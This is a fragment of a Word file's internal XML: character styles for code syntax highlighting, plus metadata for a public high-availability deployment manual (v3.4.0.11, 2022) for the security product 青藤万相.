    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5620"/>
    <w:pPr>
      <w:ind w:leftChars="800" w:left="1680"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af9">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0014057C"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KeywordTok">
    <w:name w:val="KeywordTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DataTypeTok">
    <w:name w:val="DataTypeTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DecValTok">
    <w:name w:val="DecValTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BaseNTok">
    <w:name w:val="BaseNTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FloatTok">
    <w:name w:val="FloatTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ConstantTok">
    <w:name w:val="ConstantTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharTok">
    <w:name w:val="CharTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialCharTok">
    <w:name w:val="SpecialCharTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StringTok">
    <w:name w:val="StringTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimStringTok">
    <w:name w:val="VerbatimStringTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialStringTok">
    <w:name w:val="SpecialStringTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportTok">
    <w:name w:val="ImportTok"/>
    <w:rsid w:val="00497C54"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTok">
    <w:name w:val="CommentTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentationTok">
    <w:name w:val="DocumentationTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AnnotationTok">
    <w:name w:val="AnnotationTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentVarTok">
    <w:name w:val="CommentVarTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OtherTok">
    <w:name w:val="OtherTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FunctionTok">
    <w:name w:val="FunctionTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VariableTok">
    <w:name w:val="VariableTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ControlFlowTok">
    <w:name w:val="ControlFlowTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OperatorTok">
    <w:name w:val="OperatorTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BuiltInTok">
    <w:name w:val="BuiltInTok"/>
    <w:rsid w:val="00497C54"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
    <w:name w:val="ExtensionTok"/>
    <w:rsid w:val="00497C54"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PreprocessorTok">
    <w:name w:val="PreprocessorTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
    <w:name w:val="AttributeTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="RegionMarkerTok">
    <w:name w:val="RegionMarkerTok"/>
    <w:rsid w:val="00497C54"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InformationTok">
    <w:name w:val="InformationTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WarningTok">
    <w:name w:val="WarningTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AlertTok">
    <w:name w:val="AlertTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ErrorTok">
    <w:name w:val="ErrorTok"/>
    <w:rsid w:val="00497C54"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
    <w:name w:val="NormalTok"/>
    <w:rsid w:val="00497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www.example.org/group=1,2,3"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example.org/hosts?page=0&amp;size=50&amp;sorts=ip,-desc"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oter" Target="footer2.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90D24-AACD-4ED3-BFA3-93CDAF913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0</Pages>
  <Words>43399</Words>
  <Characters>247380</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2061</Lines>
  <Paragraphs>580</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29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xiang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>long xiang</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2022-01-20T06:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-23T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-2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产品名称">
    <vt:lpwstr>青藤万相</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="手册名称">
    <vt:lpwstr>高可用部署文档（标准）</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="日期">
    <vt:lpwstr>2022.09</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="版本号">
    <vt:lpwstr>v3.4.0.11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="文档密级">
    <vt:lpwstr>密级：公开</vt:lpwstr>
  </property>
</Properties>
</file>